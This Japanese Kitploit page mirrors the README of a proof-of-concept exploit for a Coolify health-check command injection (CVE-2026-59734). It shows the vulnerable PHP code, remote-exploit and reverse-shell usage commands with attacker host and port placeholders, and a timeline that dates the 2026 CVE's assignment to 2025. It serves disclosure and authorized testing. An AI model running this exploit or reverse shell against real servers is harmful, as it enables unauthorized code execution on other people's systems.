Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-59734-POC — ヘルスチェックにおけるOSコマンドインジェクション → リモートコード実行 | Kitploit
ツール/GitHubGitHub/cybertechajju/cve-2026-59734-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育ペイロード開発
GitHubcybertechajju/cve-2026-59734-poc

CVE-2026-59734-POC

ヘルスチェックにおけるOSコマンドインジェクション → リモートコード実行

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ハッカーグリッチ

🚨 CVE-2026-59734 — Coolify RCE エクスプロイト

ヘルスチェックにおけるOSコマンドインジェクション → リモートコード実行

CVE CVSS Advisory Patched Author


Medium 解説記事 YouTube



Coolifyのヘルスチェック設定におけるOSコマンドインジェクションの概念実証エクスプロイトです。
認証されたユーザーは、デプロイされたコンテナ内で任意のコマンドを実行できました。


🎯 脆弱性について

Coolify は人気のオープンソース、セルフホスト型デプロイプラットフォーム(GitHubスター30,000以上)で、Heroku、Vercel、Netlifyの無料代替です。

Coolifyのヘルスチェック設定において、重大なOSコマンドインジェクション脆弱性が発見されました。health_check_host、health_check_method、health_check_path パラメータがサニタイズなしでシェルコマンドに直接展開され、認証された任意のユーザーがデプロイコンテナ内で任意のコマンドを実行できるようになります。

root@kitploit:~
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID           │ CVE-2026-59734                       │
│ タイプ           │ OSコマンドインジェクション (CWE-78)        │
│ 深刻度           │ 高 — CVSS 8.8                      │
│ 攻撃ベクトル     │ ネットワーク(認証済み)              │
│ 影響を受ける     │ Coolify <= v4.0.0-beta.460           │
│ 修正バージョン   │ Coolify >= v4.0.0-beta.469           │
│ 修正コミット     │ 23f9156c7                            │
│ 報告者           │ CyberTechAjju                        │
└──────────────────┴──────────────────────────────────────┘
🔥 脆弱なコード(クリックで展開)
root@kitploit:~
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()

// ⚠️ ユーザー入力をシェルコマンドに直接 — escapeshellarg()なし!
$generated_healthchecks_commands = [
    "curl -s -X {$this->application->health_check_method} -f " .
    "{$this->application->health_check_scheme}://" .
    "{$this->application->health_check_host}:" .
    "{$health_check_port}" .
    "{$this->application->health_check_path} > /dev/null || exit 1",
];

🛠️ このツールの機能

このPoCスクリプトは、2つのモードでCVE-2026-59734を検証およびエクスプロイトします:

モード説明リスク
--local脆弱なコードパターンをオフラインでシミュレートします。ネットワークリクエストは行いません。 注入可能な3つのパラメータすべてをテストし、修正を確認します。✅ 安全
--remoteAPI経由で実際のCoolifyインスタンスをエクスプロイトします。ペイロードをヘルスチェック設定に注入し、デプロイをトリガーします。

特徴

  • 🧪 4つのローカルテスト — host、method、path 経由のインジェクションを検証し、escapeshellarg() による修正が機能することを確認
  • 🔑 認証検証 — エクスプロイトを試行する前にAPIトークンと権限をチェック
  • 📋 バージョン検出 — Coolifyのバージョンを検出し、すでにパッチが適用されている場合は警告
  • 🎯 証明トークン — 一意のトークンを使用して誤検知を防止
  • 🐚 リバースシェルモード — --lhost / --lport による組み込みリバースシェルペイロード
  • 🧹 クリーンアップモード — エクスプロイト後に元のヘルスチェック設定を復元
  • 🛡️ インジェクション検証 — サーバーがペイロードをサニタイズせずに保存したことを確認

⚡ クイックスタート

ローカル検証(安全&オフライン)

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh

# 安全なローカル検証を実行
./coolify_healthcheck_rce_poc.sh --local

期待される出力:

root@kitploit:~
═══ ローカル脆弱性パターン検証 ═══

┌─ テスト1: health_check_hostインジェクション
│  ✅ 脆弱 — 注入したコマンドが正常に実行されました

┌─ テスト2: health_check_methodインジェクション
│  ✅ 脆弱 — methodパラメータも注入可能

┌─ テスト3: health_check_pathインジェクション
│  ✅ 脆弱 — pathパラメータも注入可能

┌─ テスト4: escapeshellarg() で問題が修正されることを確認
│  ✅ 安全 — サニタイズされた入力によりインジェクションを防止

リモートエクスプロイト(許可されたテストのみ)

root@kitploit:~
# 基本的なPoC — コンテナ内に証明ファイルを作成
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID

# リバースシェル
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --lhost YOUR_IP \
  --lport 4444

# 自動クリーンアップあり(エクスプロイト後に元の設定を復元)
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --cleanup

📋 全オプション

root@kitploit:~
使用法:

  ローカル検証(安全、オフライン):
    ./coolify_healthcheck_rce_poc.sh --local

  リモートエクスプロイト(認証が必要):
    ./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <TOKEN> --uuid <UUID> [オプション]

オプション:
  --url       CoolifyインスタンスのURL(例: https://coolify.example.com)
  --token     API Bearerトークン
  --uuid      ターゲットアプリケーションのUUID
  --payload   カスタムインジェクションペイロード
  --lhost     リバースシェル用の攻撃者IP
  --lport     リバースシェル用の攻撃者ポート(デフォルト: 4444)
  --cleanup   エクスプロイト後に元の設定を復元

🔍 APIトークンとアプリUUIDの取得方法

APIトークン:

  1. Coolifyダッシュボードにログイン
  2. 設定 → APIトークンに移動
  3. 新しいトークンを生成

アプリUUID:

root@kitploit:~
curl -s https://YOUR-COOLIFY/api/v1/applications \
  -H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'

📖 完全な解説記事

発見、エクスプロイト、学んだ教訓の全プロセスを詳細なブログ記事にまとめました:

🔗 CoolifyでOSコマンドインジェクション(RCE)を発見した方法 — Medium


🎥 動画チュートリアル

完全なエクスプロイトデモをYouTubeでご覧ください:

🔗 CVE-2026-59734 — Coolify RCEデモ — YouTube


✅ タイムライン


⚠️ 法的免責事項

このツールは教育および許可されたセキュリティテスト目的でのみ提供されます。

このPoCは、セキュリティ研究者やバグバウンティハンターが明示的で文書化された許可を得て監査するシステムをテストするためのものです。所有していないシステムに対する不正使用は固く禁止されており、地域、州、連邦の法律に違反する可能性があります。

著者(CyberTechAjju)は一切の責任を負わず、このツールによって引き起こされた誤用や損害について責任を負いません。


🏆 CyberTechAjjuによるその他のCVE

ツールをダウンロード
⚠️ 認証が必要
日付イベント
2025年1月6日🔍 GitHub Security Advisory経由で発見・報告
2025年1月16日✅ Coolifyメンテナーが報告を受け入れる
2025年2月24日🔬 調査確認
2025年3月18日🔧 修正コミット (23f9156c7)
2025年4月12日📦 v4.0.0-beta.469で修正リリース
2025年7月🏷️ CVE-2026-59734割り当て、アドバイザリ公開
CVEターゲットタイプ深刻度
CVE-2026-45156Nextcloud user_oidcJWT署名バイパス🔴 クリティカル (9.8)
CVE-2026-59734CoolifyOSコマンドインジェクション🟠 高 (8.8)

Medium YouTube GitHub



"彼らはサニタイズを忘れた。私は報告を忘れなかった。"
🇮🇳 地球をハックしろ。🌎💻